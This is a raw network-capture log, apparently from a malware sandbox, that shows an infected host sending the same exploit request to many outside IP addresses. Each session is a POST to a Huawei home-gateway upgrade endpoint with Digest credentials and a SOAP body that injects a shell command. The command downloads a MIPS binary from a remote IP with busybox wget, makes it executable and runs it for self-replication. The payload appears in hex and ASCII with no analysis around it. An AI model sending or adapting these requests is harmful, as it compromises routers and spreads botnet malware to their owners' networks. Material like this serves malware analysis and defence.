                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        167192.168.2.2353486101.68.94.23137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.298969984 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        168192.168.2.2349200157.184.121.25437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.299026012 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        169192.168.2.235770441.51.244.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.299034119 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        170192.168.2.233341676.67.19.7237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.299062014 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        171192.168.2.235043825.148.131.3237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.299086094 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        172192.168.2.234606641.212.203.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.299107075 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        173192.168.2.235340841.222.94.6437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300121069 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        174192.168.2.2352390157.206.146.2537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300121069 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        175192.168.2.2354564197.0.184.10637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300162077 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        176192.168.2.2338324197.90.38.24737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300169945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
